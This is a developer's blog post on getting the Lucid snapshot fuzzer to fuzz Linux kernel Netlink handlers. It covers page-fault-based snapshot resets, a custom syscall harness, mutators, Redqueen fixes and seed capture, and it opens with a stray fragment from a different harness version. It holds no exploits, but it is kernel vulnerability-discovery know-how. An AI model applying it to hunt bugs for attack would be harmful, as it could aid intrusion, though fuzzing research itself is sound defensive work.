	if (input->total_len != fc.input_len || input->total_len > LF_MAX_INPUT_LEN)
		return 1;

	// Sanity check the number of messages
	if (input->num_envs > LF_MAX_NUM_ENVS || input->num_envs == 0)
		return 1;

	// Check how many remaining bytes we have, and subtract what we already
	// consumed with the input metadata
	remaining = input->total_len;
	remaining -= LF_INPUT_HDR_SIZE;

	// Start tracking an offset into the byte buffer where we're reading from
	offset = LF_INPUT_HDR_SIZE;

	// Iterate through the envelopes and parse each one
	for (i = 0; i < input->num_envs; i++) {
		// Make sure we have enough data remaining to parse an envelope metadata
		if (remaining < LF_ENV_HDR_SIZE)
			return 1;

		// We can at least read the length field, and sanity check it
		env = (struct lf_envelope *)(fc.input + offset);
		if (env->len > LF_MAX_ENV_LEN || env->len == 0)
			return 1;

		// Consume those bytes
		remaining -= LF_ENV_HDR_SIZE;

		// Make sure we can read that much data
		if (remaining < env->len)
			return 1;

		// We have enough data left, create the skb for this envelope
		fuzz_skb = create_fuzz_skb(env, i);
		if (!fuzz_skb)
			return 1;

		// Dispatch the fuzz_skb to nftables!
		dispatch_skb(fuzz_skb);

		// Update our offset
		offset += (LF_ENV_HDR_SIZE + env->len);

		// Update remaining
		remaining -= env->len;
	}

	// Done parsing envelopes, check if we have remaining bytes
	if (remaining)
		return 1;

	/** LUCID RESTORES SNAPSHOT **/
	asm volatile("xchgw %bx, %bx");

	// Finally done
	return 0;
}

// Cleanup resources from lf_init(), not used when fuzzing but good for harness
// dev/testing
void lucid_fuzz_cleanup(void) {
	int i = 0;

	for (i = 0; i < LF_MAX_NUM_ENVS; i++) {
		kfree_skb(skbs[i]);
		skbs[i] = NULL;
	}

	// NULL the globals
	kern_sock = NULL;
	handler = NULL;

	// Set input size to 0
	fc.input_len = 0;
}

Lucid Dreams I: Lucid’s First Time Fuzzing

2025-10-04T00:00:00+00:00

Background

We’ve spent a lot of time so far on this blog documenting the development process of Lucid, our full-system snapshot fuzzer, and I really wanted to start using it to do some real fuzzing. So the focus of this blog post will be documenting the process I had to take to get Lucid up and fuzzing on a real target. So far, Lucid has only worked on a toy harness/example, and so we need to see what kind of things need tweaking when a real target comes into play.

Off-Blog Snapshot Dev

Since the last post, the biggest change has been the way we do snapshots. I found that on the simple development target, a really tight fuzzing loop, the scaling factor for the old snapshot method deteriorated quickly.

Old Snapshot Method Revisited

If you remember, the fuzzer works by loading a static-pie ELF image of the Bochs x86 emulator into the fuzzer process and context switching between the now sand-boxed emulator that runs our target and our fuzzer which does all the fuzzy things. Because we load and sand-box Bochs, we know the location of every memory segment in the image that is writable, as well as where the dynamic memory is because we don’t allow Bochs to interface with the OS to allocate memory, the fuzzer handles that. So what we did was map the writable memory segments such that they were all contiguous in memory. Then when we take a snapshot of Bochs, all we have to do is capture that memory state and save it off. We did that, and we saved the memory as a memory-backed file. On Linux, snapshot restoration then becomes very simple, we just mmap that memory backed file back over top the contiguous writable memory region. One single syscall to restore memory. We did this mainly because it was very simple. Well it turns out, when you ask the kernel to invalidate/destroy/and overwrite billions of bytes worth of pages thousands of times per second, it scales poorly. Embarrassed to admit that I don’t quite remember what the bottleneck was, but I seem to remember that the mmap requests seemed to need some sort of serialization and were spending most of their CPU time destroying the dirtied memory backing pages. My scaling factor went into the toilet once I brought up the 8 cores I have on my devbox. So I had to find another way to do this, likely one that didn’t depend on restoring all writable memory each iteration, but differentially resetting only dirty memory in Bochs.

New Strategy for Linear Scaling

We want to be able to scale Lucid linearly as we bring more cores online for fuzzing, so we want our scaling factor to be one-to-one with the amount of cores being used. 100 cores should bring us a 100x speed-up over single-core fuzzing. So we need a way to differentially restore only the dirty memory and not all writable memory. We also want to strive for a method that doesn’t invoke the kernel via syscall, because that’s how you bottleneck across cores. The way I decided to do this is not novel and I didn’t invent this method, it’s actually similar to the way a lot of fuzzers get coverage feedback on black-box targets.

What I ended up doing is marking all of the writable pages that we load for Bochs as having no write permissions (strictly PROT_READ). This way, when Bochs tries to write to a page, it will cause a page-fault. On Linux, your process gets a signal delivered whenever this happens and you can invoke a function to handle signals. So I patched Bochs to handle these page faults and in the signal handler function Bochs marks the faulting address as a dirty page in a data structure that both Bochs and Lucid have access to. So now, we’ve logged a page that was dirtied and we then make that page permanently writable and we restore that page on snapshot reset every time now. This design boils snapshot restoration down to a series of memcpy calls from the snapshot memory to the dirty memory. Now we’ve achieved differential restoration and everything is done purely in userspace via memcpy, no syscalls are invoked in the hot path to restore the snapshot. This seems to scale perfectly and we’re pretty close to the one-to-one scaling factor we’re after. The fuzzers spend 100% of their time in userland when they’re executing the hot fuzzing loops.

+----------------------------------------------+
| [1] Fuzzcase Begins                          |<---------------+
| Lucid starts executing target code in Bochs. |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [2] Bochs Writes to Page                     |                |
| Attempted write -> page is PROT_READ only.   |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [3] Page Fault Handler                       |                |
| Fault occurs -> handler adds page to dirty   |                |
| list and sets protection to PROT_WRITE.      |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [4] Fuzzcase Ends                            |                |
| Execution completes                          |                |
+----------------------------------------------+                |
                               |                                |
                               v                                |
+----------------------------------------------+                |
| [5] Snapshot Restore                         |                |
| Lucid iterates dirty list -> memcpy snapshot |                |
| contents back into those pages.              |----------------+
| (No syscalls, all user-space.)               |
+----------------------------------------------+

Redqueen for Compare Solving

I also was able to implement Redqueen by instrumenting compare instructions in Bochs. We’ll get into Redqueen in more details below when we enable compare coverage in our fuzzing experiment and try to determine how helpful it is for this specific target.

Harness Development

With that out of the way, we need something to fuzz! For this, I wanted to do something very broad and shallow, so I homed in on looking at Linux kernel subsystems that accessible via Netlink. Netlink is a network/communication protocol that allows userspace to communicate with the kernel over sockets, vs. something like a driver or a syscall. A lot of the bugs that have been exploited in public the last 5 years, have been bugs in subsystems that have Netlink plumbing, things like: netfilter, the packet scheduler, etc. Because these subsystems are designed to just receive bytes of Netlink buffer data, I thought this would be a great first thing to get fuzzing on.

Since we want to fuzz multiple subsystems (broad, shallow), we first have to figure out how Netlink communications normally function. The typical workflow of a userspace program or utility that wants to communicate with the kernel over Netlink is to open a Netlink socket of a specific type of Netlink protocol, something like the following that are used in the harness: NETLINK_ROUTE, NETLINK_XFRM, NETLINK_NETFILTER, and NETLINK_CRYPTO. For example:

socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER)

When the userspace program sends data to the Netlink socket that has a protocol associated with it, we end up in netlink_sendmsg. This function’s job is basically to create an appropriately initialized struct sk_buff that wraps the user’s data that was sent via the sendmsg syscall. This socket buffer is then dispatched to the appropriate handler (in the example, the handler for NETFILTER would be nfnetlink_rcv).

So what I want to do is skip any userspace to kernel context switching in our harness and just inject our fuzzing inputs directly into kernel space to be dispatched to the appropriate handlers. So I ended up structuring the fuzzing input as a series of what I’m calling “messages” and each “message” is its own Netlink message for a random protocol that we’re fuzzing. I settled arbitrarily on fuzzing inputs maxing out at 16 messages, so we can randomly send any number of messages per input up to 16. In the fuzzing harness, we use these data structures to create a fuzzing input:

// An input structure
struct lf_input {
	u32 total_len;
	u32 num_msgs;
	u8 data[];
};

// A message structure
struct lf_msg {
	u32 protocol;
	u32 msg_len;
	u8 data[];
};

So the entire input structure is described by struct lf_input which tells us the total length of the messages it contains and the number of messages followed by all of the messages stuffed together. An individual message is described by struct lf_msg which contains a protocol member corresponding to one of the NETLINK protocols we listed earlier (NETLINK_ROUTE, NETLINK_XFRM, NETLINK_NETFILTER, and NETLINK_CRYPTO) and then the message’s length msg_len and the message’s data thereafter:

============================= LUCID INPUT STRUCTURE =============================
lf_input {
  total_len: 4 bytes
  num_msgs:  4 bytes
  ────────────────────
  lf_msg {
    protocol: 4 bytes  (ROUTE=0, XFRM=1, NETFILTER=2, CRYPTO=3)
    msg_len:  4 bytes
    data:     variable (netlink message bytes)
  },
  lf_msg {
    protocol: 4 bytes  (ROUTE=0, XFRM=1, NETFILTER=2, CRYPTO=3)
    msg_len:  4 bytes
    data:     variable (netlink message bytes)
  },
  ... (up to 16 messages)
}
=================================================================================

For testing and development purposes, I leveraged the flexibility/power of snapshot fuzzing to just add a new syscall to the Linux kernel that looked like:

SYSCALL_DEFINE2(lucid_fuzz, const void __user *, data, size_t, len)
{
    printk("Inside lucid fuzz!\n");
	int ret = 0;

	// Initialize everything we need to fuzz
	ret = lf_init(data, len);
	if (ret)
		goto done;

    printk("Initialization done\n");

	// Handle fuzz inputs
	if (lf_handle_input()) {
		ret = -EINVAL;
		goto done;
	}

	// Cleanup resources, not needed when fuzzing, but good for testing
	lf_cleanup();

done:
    printk("Inside done, returning %d!\n", ret);
	return ret;
}

So this will take a user supplied data buffer and send it to lf_init, which is a function I wrote that pre-allocates the socket buffers we want to use (remember we know that at most we can send 16 messages) and finds all of the Netlink subsystem receive handlers, functions like: nfnetlink_rcv, rtnetlink_rcv, crypto_netlink_rcv, and xfrm_netlink_rcv. When not fuzzing under Lucid, the syscall will copy the user supplied data into the global “fuzzcase” variable and then lf_handle_input will take care of wrapping that fuzzcase into the appropriate pre-allocated socket buffer and sending it to the appropriate handler. Here is what lf_handle_input looks like, this is where the magic happens. Keep in mind that the fc variable is a global, standing for “fuzzcase” and this is where Lucid injects fuzzing inputs:

// Main fuzzcase handling logic
int lf_handle_input(void) {
	int i = 0;
	struct lf_input *curr = NULL;
	struct lf_msg *msg = NULL;
	u32 remaining = 0;
	u32 offset = 0;
	struct sk_buff *fuzz_skb = NULL;

	printk("Inside lf_handle_input\n");

	/** LUCID TAKES SNAPSHOT HERE **/
	asm volatile("xchgw %dx, %dx");

	// Make sure we have enough size to make an `lf_input` struct
	if (fc.input_len < sizeof(struct lf_input))
		return 1;

	// Get the `lf_input` and do sanity checks
	curr = (struct lf_input *)fc.input;
	if (curr->total_len != fc.input_len || curr->total_len > LF_MAX_INPUT_SIZE)
		return 1;

	if (curr->num_msgs > LF_MAX_MSGS)
		return 1;

	// Remaining bytes to consume
	remaining = curr->total_len;

	// Since we created a structure, we have consumed the `lf_input` header, we
	// can count those bytes as consumed and update remaining
	remaining -= LF_INPUT_HDR_SIZE;

	// Update offset to point to the first message
	offset = LF_INPUT_HDR_SIZE;

	// Parse and handle the messages in the
	for (i = 0; i < curr->num_msgs; i++) {
		// Make sure we have enough size to make an `lf_msg` struct
		if (remaining < LF_MSG_HDR_SIZE)
			return 1;

		// Create an `lf_msg` struct
		msg = (struct lf_msg *)(fc.input + offset);
		if (msg->msg_len > LF_MAX_MSG_SIZE || msg->protocol >= LF_NUM_PROTOCOLS)
			return 1;

		// We've now consumed the message header bytes
		remaining -= LF_MSG_HDR_SIZE;

		// Make sure we have enough data remaining to fill this message
		if (remaining < msg->msg_len)
			return 1;

		// Create a fuzzcase skb to send to netlink_rcv function
		fuzz_skb = create_fuzz_skb(msg, i);
		if (!fuzz_skb)
			return 1;
		
		// Dispatch the skb to the appropriate handler
		dispatch_skb(msg, fuzz_skb);

		// Update offset
		offset += (LF_MSG_HDR_SIZE + msg->msg_len);

		// Update remaining
		remaining -= msg->msg_len;
	}

	// Check to see if we have remaining, if we do, something is amiss
	if (remaining)
		return 1;

	/** LUCID RESTORES SNAPSHOT HERE **/
	asm volatile("xchgw %bx, %bx");

	// Success
	return 0;
}

We iterate through the array of messages, parse them, and send them on their way to the appropriate subsystem. I also made this harness extremely strict so that we fail if anything is amiss, even if we have leftover bytes after parsing. This will cause lf_input to return early and not reach the snapshot restoration NOP instruction. This would cause the fuzzcase to “escape” the fuzzing harness and would eventually incur a timeout. In Lucid, we do timeouts based on the number of emulated instructions. So it would be immediately obvious if we had some mutator/generator/harness bug because the fuzzcases would timeout.

During this portion of development, I was really focused on optimizing the harness. I wanted to skip all of the Netlink sanity checking and plumbing that takes place after the initial netlink_sendmsg function thinking this would speed up the fuzzer a substantial amount. I was really careful to retain semantic equivalence to that skipped code though. However, in the end, I made mistakes that you may be able to spot. For instance, during a normal netlink_sendmsg call, the socket buffer that it creates doesn’t have all of the same fields initialized and it doesn’t use kernel sockets. So I actually had a single false positive NULL pointer dereference crash at one point during my longest fuzzing session that wouldn’t have existed if I had retained 100% semantic equivalence. I think going forward on the blog, I’ll move more towards less invasive harnessing and just eat the performance hit. It became apparent when our fuzzcases started reaching deeper code paths that the fuzzer was extremely slow and the aggressive optimization in the harness wouldn’t have really made much of a difference, so I’m going to skip that going forward.

It should be noted that this is not a great approach for finding bugs. We’re merely trying to assess how Lucid does fuzzing some real code. Sending random messages per input to the various subsystems that have little interplay with one another and can’t access each other in any meaningful way is not a strategy for reaching deep code and finding complex bugs. Fuzzing in this way is more likely to reveal simple shallow parsing level bugs, and in 2025 that is probably not going to yield many results.

Stage-1 Fuzzing: Dumb Byte Mutator

First thing is first, let’s throw some random bytes at these Netlink handlers. To do this, I changed how Lucid sees mutator code. Now, there is a top-level Mutators crate and it defines several generic traits and characteristics that every custom mutator implementation must have. These are things like a rand function for example. But after you implement the generic stuff that the core fuzzer relies on existing, you are free to have as custom of a mutator as you like. Now you can implement any mutator you want and put it under mutators/ in the source code directory. This allows some pretty nice flexibility. I added a command line flag to specify a mutator by name and then they are created by the factory type function here in mod.rs:

/// Simple factory to create mutators by name (extend as needed).
pub fn create_mutator(
    name: &str,
    seed: Option<usize>,
    max_size: usize,
) -> Result<Box<dyn Mutator>, LucidErr> {
    match name {
        "toy" => Ok(Box::new(ToyMutator::new(seed, max_size))),
        "netlink" => Ok(Box::new(NetlinkMutator::new(seed, max_size))),
        _ => Err(LucidErr::from(&format!("Unrecognized mutator '{}'", name))),
    }
}

I started off by just implementing some basic mutation strategies:

ByteInsert: Randomly insert bytes of arbitrary value into the message buffer
ByteOverwrite: Randomly overwrite a byte in the message with a byte of arbitrary value
ByteDelete: Randomly delete a byte from the message buffer
BitFlip: Randomly flip a bit in the message buffer
ProtocolChange: Randomly change the protocol of a message (ie, switch from NETLINK_ROUTE to NETLINK_NETFILTER)

In addition to these strategies, the mutator will often “stack” these strategies per input. I defined a MAX_STACK of 7 (arbitrary), and so the mutator may choose to randomly mutate the input with up to 7 of these strategies per iteration.

These mutation strategies actually achieved quite a bit of code coverage surprisingly. Initially, the iterations were extremely short because most Netlink messages we sent were nonsensical. The Netlink message structure looks like this:

/**
 * struct nlmsghdr - fixed format metadata header of Netlink messages
 * @nlmsg_len:   Length of message including header
 * @nlmsg_type:  Message content type
 * @nlmsg_flags: Additional flags
 * @nlmsg_seq:   Sequence number
 * @nlmsg_pid:   Sending process port ID
 */
struct nlmsghdr {
	__u32		nlmsg_len;
	__u16		nlmsg_type;
	__u16		nlmsg_flags;
	__u32		nlmsg_seq;
	__u32		nlmsg_pid;
};

Since we’re sending random bytes, we rarely have a nlmsg_len that makes sense for our random message array of bytes. So it took a while for the fuzzer to generate the right type of input to solve early message parsing to actually reach code behind that sanity check. We had to generate an input that had the right length.

Here are the results I achieved with this simple mutator and our aforementioned harness in a short time:

[lucid stats (start time: 2025-09-19 08:57:11)]
globals: uptime: 0d 22h 26m 28s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 88.266M | iters/s: 206.81 | iters/s/f: 25.85
cpu: target: 92.7% | reset: 6.8% | mutator: 0.0% | coverage: 0.5% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 16917 | last find: 0h 2m 6s | map: 25.81%
snapshot: dirty pages: 3841 | dirty / total: 0.00068% | reset memcpys: 438
corpus: inputs: 31000 | corpus size (MB): 318.303 | max input: 0x8088

You can see that we fuzzed the harness with this iteration of the mutator for almost a full day on my development VM. It surprisingly captured quite a bit of edges, around ~17k. We can also see that we were able to process quite a bit of iterations as we almost reached 100 million iterations during that time period. Globally across all 8 fuzzers we were sitting at about 200 iterations/sec when the last stats banner printed. Relatively speaking to subsequent versions of the mutator, this is quite a bit of throughput. This is because, like we discussed, most inputs simply didn’t pass initial parsing and so they returned early; in other words, our mutator created a ton of junk that didn’t do anything worthwhile. So while the throughput looks good on paper, it’s actually not good for us. We can also tell this by the relatively high number of CPU time we spend in reset, meaning we spend almost 7% of our time performing snapshot resets.

It should be noted before we get much further comparing results across different iterations of the fuzzer that these results are likely not very meaningful. We can possibly deduce large picture conclusions like: it’s better to send inputs that have a sane nlmsg_len, but the results are likely too random to glean much else when we aren’t making 10x improvements. So keep that in mind, we aren’t doing a proper experiment here. I make a change to the fuzzer, run it for a day or so, check results, compare, repeat. With how low our throughput is (Lucid is very slow), and how limited our fuzzing time is, we can’t produce high-quality statistics.

It should also be noted that when I tweeted about fuzzing with Lucid using this mutator, I mentioned that the fuzzer did find an edge case OOB read bug, but it was artificial in that upstream sanity checks that our harness skips would prevent it from happening. So I’m not counting it as Lucid’s first 0day.

Stage 2 Fuzzing: More Mutation Strategies

The next step is to flesh out the mutator a little more. For the next step, I added several new mutation methods that would enable us to increase our efficiency (not send so much garbage) and also create inputs that would’ve previously been pretty impossible.

I added the following mutation strategies:

UniProtocol: Make every message in the input target the same protocol
DuplicateMessage: Duplicate one of the messages in the input
ShuffleMessages: Randomly shuffle the order of the messages in the input
SpliceMessage: Steal a message from another input and splice it into the current input
PatchHeaderLen: Determine what the correct nlmsghdr->nlmsg_len value should be and patch it
PatchHeaderType: Somewhat intelligently, put message type values in place of nlmsghdr->nlmsg_type for the subsystems we’re targeting
PatchHeaderFlags: Randomly create somewhat logically sane nlmsghdr->nlmsg_flags values

This step helped us quite a bit, it basically improved our efficiency by 2x:

[lucid stats (start time: 2025-09-20 16:24:38)]
globals: uptime: 0d 14h 8m 35s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 2.821M | iters/s: 31.18 | iters/s/f: 3.90
cpu: target: 97.4% | reset: 2.4% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 17740 | last find: 1h 4m 52s | map: 27.07%
snapshot: dirty pages: 7455 | dirty / total: 0.00132% | reset memcpys: 648
corpus: inputs: 313510 | corpus size (MB): 3779.988 | max input: 0x8088

As you can see, we were able to capture more edges in about half the time wall-clock wise. In terms of iterations, we were able to capture more edges in 40x less iterations. So this is a pretty massive efficiency boost. I think most of this comes from having sane nlmsghdr->nlmsg_len values being saved to the corpus as well as the mutation strategies that allow us to create more complex inputs.

Previously if we were able to randomly generate a message that achieved quite a bit of code coverage, we were kind of limited in that we would have had to get extremely lucky to have another message in the same input randomly become similarly successful via dumb byte flipping. Instead now, we have new strategies like message duplication, message splicing, and unifying protocols so that each message has a chance to be sent to the same subsystem etc, and we can achieve deeper code coverage because our messages can now build off of previous messages in the same input.

Because our inputs had such a dramatically higher chance of passing initial parser checks now, our throughput has plummeted to around 2-4 iterations/sec/fuzzer. I have to admit this was shockingly lower than I expected for the fuzzer. I know Bochs emulation is a considerable slow down from native execution, somewhere around 100x I believe, but I hadn’t really seen it yet because up to this point we had only fuzzed toy targets for fuzzer development. This is why people say not to optimize too early, we had no idea that our Bochs emulation bottleneck was so pronounced and we could’ve spent so much time micro-optimizing core fuzzer code and it wouldn’t have made a difference at all.

Stage 3: Adding Compare Coverage with Redqueen

To this point, we hadn’t been using Lucid’s built in Redqueen tooling. For those that are unaware, Redqueen is the name of a fuzzing paper by the geniuses at Ruhr-University in Bochum that tackles the problem of solving comparisons in fuzzing.

Oftentimes in fuzzing, the target will want to compare values derived from your input to values that it knows should/could exist. For instance, the following may exist semantically in a fuzzing target:

if (*(uint32_t *)(&fuzzing_input[0x1337]) == 0xdeadbeef) {
  buggy_function();
}

In this example, the target is checking our input for the presence of a magic value, in this case 0xdeadbeef. A lof of the time, these simple magic byte value checks represent a huge roadblock in automated fuzzing with no human in the loop. Using our dumb byte flipping mutations, we would have to successively target the 4 consecutive bytes and also randomly make them all the write value. This can be basically impossible in a lot of circumstances.

Redqueen’s contribution is that these types of checks often boil down to cmp instructions on x86 architectures, where two “operand values” are compared with one another, these being the left operand and the right operand. Now from the point of view of determining which side is derived from the input and which side is derived from the program, it is often impossible to make this distinction. So what Redqueen does is it searches the input for both operands, if it finds one of the operands, it replaces it in the input with the other operand value, hoping that we can now pass the check.

This would be extremely expensive normally during fuzzing, so to minimize overhead, Redqueen only performs this type of mutation on inputs that recently found new code coverage, this way the overhead is mostly a one-time cost and the overhead asymptotes to zero as the campaign progresses and new coverage becomes ever more rare.

This isn’t really a fair overview of the technique, but this conveys the gist. Please read the linked paper if you’re interested, it’s probably my favorite fuzzing paper to date.

We can implement this in our fuzzer because we have access to all compare instructions of all sizes for free in Bochs. So now, what I do is, when I find a new input, I toggle something in the shared execution context data structure between Lucid and Bochs called the “CPU mode” and this tells Bochs what kind of emulation we’re doing. Once we find a new input, I replay the input but with the CPU mode set to Cmplog. This will cause Bochs to report all of the operand values that it sees in the compare instructions, the instruction pointer value, and the size of the operands back to Lucid. Lucid can now create a data base of values and try the Redqueen strategy for more coverage.

However, we ran into a huge problem, check out the statistics from the Redqueen enabled run:

[lucid stats (start time: 2025-09-21 20:13:29)]
globals: uptime: 0d 14h 18m 23s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 369.79K | iters/s: 0.10 | iters/s/f: 0.01
cpu: target: 9.1% | reset: 0.0% | mutator: 0.0% | coverage: 0.0% | redqueen: 90.9% | misc: 0.0%
coverage: edges: 15829 | last find: 0h 17m 16s | map: 24.15%
snapshot: dirty pages: 7224 | dirty / total: 0.00128% | reset memcpys: 532
corpus: inputs: 32272 | corpus size (MB): 430.671 | max input: 0x8088

We basically were only doing Redqueen analysis for the entire fuzzing run of 14 hours wherein we got roughly 7 global iterations through per second. This means that Redqueen has become a prohibitive bottleneck. And we can tell by the amount of edges we discovered that it didn’t help much, at least not initially. This general pattern can be expected:

Early in the campaign we find new coverage often
Inputs are being sent to Redqueen often

That is not surprising. However, I found that there were several problems with the Redqueen implementation itself.

Issue-1

The Redqueen paper also pointed out that sometimes input data is transformed or encoded before being compared. For instance, maybe input data is originally a u64 value but is cast as an i32 before being compared. If that were the case, we would never find the compare operand value for the i32 in our input, so we would instead need to precompute a handful of common encodings and instead search for them. If we found the compare operand -> encoding value, we’d then replace it with the same encoding of the other operand value. This makes sense. However, I had a logic bug in my implementation that attempted to solve the compare by generating all possible encodings for the found operand value instead of the single matching encoding. This increased the number of input patches to try by 15-20x.

The Redqueen paper also discovered that substituting the operand value but doing arithmetic to -1 or +1 the value was helpful in passing less/greater than comparisons. Remember we only hook compare operations that might set CPU flags and we don’t know what the program does with that information afterwards so this helps us bypass those checks as well. So in my erroneous implementation, that will 3x the number of patches we attempt which was already 15-20x too many, so that’s now around 45-60x too many patches to test.

So here’s a concrete example of what I was doing:

I receive a report of an operand value pair 0x1337 and 0xdead. These are 2 byte values.
I was pre-computing every possible encoding for both pairs (this part is correct)
If I found an encoding variant of 0x1337, say zero-extended to a u32, so 0x00001337 in the input, what I should be doing is applying that same encoding scheme to its partner value and creating 0x0000dead. Then I would replace 0x00001337 in the input with 0x0000dead.
Instead, I was replacing 0x00001337 with every possible similarly sized encoding of 0xdead

Issue-2

But wait, it gets worse! I was also not deduplicating operands based on the RIP value of the cmp instruction. Now normally, this can be ok because it allows you to potentially pass more dynamic comparisons where maybe both operand values are everchanging based on your input, say a checksum for example. However, with our throughput issues, and just wanting to do the bare-minimum here and defeat classic magic number comparisons, we can whittle down the number of input patches to try significantly by ignoring operands collected from RIP values we’ve already collected. We will rely on human-in-the-loop intervention if we ever need to defeat checksum type comparisons.

Issue-3

To cap everything off, I was creating all of the patched inputs before trying them all serially. So I would pre-compute the patched inputs and stuff them in an input queue that Lucid would then prioritize over normal mutations. This led to my fuzzers being SIGKILL by the kernel as they started holding too many inputs in memory overnight. That is actually what ended this stage of experimentation. So this fuzzing stage was an abject disaster and we end up making a ton of improvement in the next iteration.

Issue-4

Minor Note: The Redqueen paper also employed a technique it called “colorization” wherein the input would be “colored” with random bytes up until the coloring changed the execution path of the input. So it would overwrite input data with random bytes and check to see if that affected the execution path. It started with the largest amount of randomization possible and then using something like binary search, would continue to shrink the portions of the input that would be colorized until its execution trace matched the original. The purpose of this is to make finding operand values in the input easier. Instead of an input being full of 0x0 values for instance, it now contains random data and when you capture the compare operand values, that random data in the capture is easier to spot in the input and you don’t run the risk of duplicating candidate insertions. This is actually genius. Lucid has this feature too, but I found that I was spending dozens of seconds colorizing large inputs. This is because we simply are so slow. I decided that the juice wasn’t the squeeze and made it such that in order to use colorization now, you have to pass a command line flag to opt into it.

Stage 4: Fixing Redqueen

Besides fixing the aforementioned logical errors, I added some new logic to the implementation. First, I started deduping operand values collected by the RIP value. So we no longer are doing Redqueen analysis for the same RIP compare operands more than once.

Additionally, I stopped collecting compare operands for values that weren’t at least 4 bytes in size. I figure that most mutators should be able to randomly pass 1 and 2-byte comparisons by sheer luck.

I also capped the number of Redqueen inputs you can put in the fuzzer’s test queue at 500. In my testing, we never even really approached 500 inputs in the test queue with the fixed encoding search, deduping RIP, and removing < 32-byte compares. Previously, in the broken impelmentation, some fuzzers were carrying up to 1 million inputs to test!

Fixing the bugs and adding these two new things to the Redqueen code helped immensely and we achieved the following fuzzing run:

[lucid stats (start time: 2025-09-22 11:47:27)]
globals: uptime: 0d 5h 49m 26s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 738.01K | iters/s: 34.30 | iters/s/f: 4.29
cpu: target: 98.1% | reset: 1.8% | mutator: 0.0% | coverage: 0.1% | redqueen: 0.0% | misc: 0.0%
coverage: edges: 16100 | last find: 0h 1m 10s | map: 24.57%
snapshot: dirty pages: 7290 | dirty / total: 0.00129% | reset memcpys: 557
corpus: inputs: 70366 | corpus size (MB): 877.591 | max input: 0x8088

As you can see, we doubled the throughput in half of the wall-clock time. We also didn’t use so much memory that the fuzzers got killed, so that’s good. Now that Redqueen is fixed, we can move on.

Redqueen Success Example

Redqueen proved to be extremely helpful at finding new edges once we got away from the first 30 minutes or so of fuzzing. This was an awesome example I have to share:

[lucid stats (start time: 2025-09-24 15:23:35)]
globals: uptime: 0d 0h 56m 54s | fuzzers: 8 | crashes: 0 | timeouts: 0
perf: iters: 96.08K | iters/s: 18.05 | iters/s/f: 2.26
cpu: target: 97.7% | reset: 1.4% | mutator: 0.0% | coverage: 0.0% | redqueen: 0.7% | misc: 0.0%
coverage: edges: 19920 | last find: 0h 0m 56s | map: 30.40%
snapshot: dirty pages: 8122 | dirty / total: 0.00144% | reset memcpys: 982
corpus: inputs: 2581 | corpus size (MB): 8.827 | max input: 0x10088
fuzzer-2: Fuzzing increased edge count 19475 -> 19476 (+1)
fuzzer-1: Fuzzing increased edge count 19505 -> 19507 (+2)
fuzzer-7: Fuzzing increased edge count 19194 -> 19196 (+2)
fuzzer-4: Fuzzing increased edge count 19365 -> 19370 (+5)
fuzzer-4: Redqueen increased edge count 19370 -> 19721 (+351)
fuzzer-4: Redqueen increased edge count 19721 -> 19784 (+63)
fuzzer-4: Redqueen increased edge count 19784 -> 20925 (+1141)

fuzzer-4 starts off well behind the record edge count (19920) at 19365 edges discovered. It uses normal fuzzing mutation strategies and increases its edge count to 19370. Then, that new-edge-finding input is sent to Redqueen for processing and Redqueen dramatically increases the fuzzer’s edge discovery progress. It rapidly discovers 1555 new edges which is an 8% increase over what it had just reached with fuzzing.

Stage 5: Adding Seeds, Mutator Tweaks, Misc.

Seeds

In this stage, the focus was mainly on creating seed inputs that would start the fuzzing campaign off with a lot of coverage. Up to this point, the most edges we ever discovered for this fuzzing target/harness was around 17.5k which we saw with our improved mutator but without compare coverage and running for around 14 hours. Now, that doesn’t mean that compare coverage is a hinderence to edge discovery, it just means that early on it’s not as effective at finding new edges as the normal fuzzing strategies were. With seeds, I was hoping to see a dramatic increase in the number of edges discovered because we’d be spoon feeding the mutator some of the complex inputs it needs to generate.

To create seed inputs, I actually just created an LD_PRELOAD shared object that hijacked the sendmsg libc invocation found in several command line utilities that normally come packaged in Ubuntu to interact with these subystems. I’m talking about tc for setting up qdiscs or the network scheduler for NETLINK_ROUTE, or nft to interact with nf_tables for NETLINK_NETFILTER etc. I simply hook the sendmsg libc function and have it dump the message contents to the terminal in hex. Here is an example:

root@luciddev:/home/h0mbre/netlink_fuzzing# LD_PRELOAD=./hexdump_netlink.so tc qdisc add dev dummy0 root pfifo_fast
echo "3400000024000506fa2cd46800000000000000000700000000000000ffffffff000000000f000100706669666f5f666173740000"

Then I just pasted that echo string into the terminal and wrote the hex to a file and then wrapped those bytes in our fuzzing input data structure using Python:

#!/usr/bin/env python3
import sys

# lf_protocols = {0: ROUTE, 1: XFRM, 2: NETFILTER, 3: CRYPTO}

def build_seed(hex_string: str, protocol: int, out_file: str):
    # Parse hex string into bytes
    payload = bytes.fromhex(hex_string)
    payload_len = len(payload)

    # Lengths
    lf_msg_hdr_len = 8
    lf_input_hdr_len = 8
    total_len = payload_len + lf_msg_hdr_len + lf_input_hdr_len
    num_msgs = 1

    # Build buffer
    buf  = total_len.to_bytes(4, "little")
    buf += num_msgs.to_bytes(4, "little")
    buf += protocol.to_bytes(4, "little")
    buf += payload_len.to_bytes(4, "little")
    buf += payload

    # Write to disk
    with open(out_file, "wb") as f:
        f.write(buf)

    print(f"Wrote {out_file} ({len(buf)} bytes, payload={payload_len} bytes)")


if __name__ == "__main__":
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]}   ")
        sys.exit(1)

    hex_file, protocol_str, out_file = sys.argv[1:]
    protocol = int(protocol_str)

    with open(hex_file, "r") as f:
        # join lines, strip whitespace/newlines
        hex_string = "".join(line.strip() for line in f)

    build_seed(hex_string, protocol, out_file)

